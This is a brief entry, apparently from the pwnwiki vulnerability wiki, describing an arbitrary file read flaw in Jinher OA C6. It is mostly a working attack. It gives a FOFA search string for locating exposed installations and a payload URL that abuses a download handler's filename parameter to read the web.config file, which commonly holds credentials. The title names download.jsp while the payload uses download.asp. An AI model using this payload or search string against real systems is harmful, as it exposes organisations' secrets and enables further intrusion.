Loading
0

金和OA C6 download.jsp 任意文件读取漏洞

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

,

漏洞影响

金和OA

FOFA

app="Jinher-OA"

Payload

/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

读取web.config

/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

免费、自由、人人可编辑的漏洞库--pwnwiki.com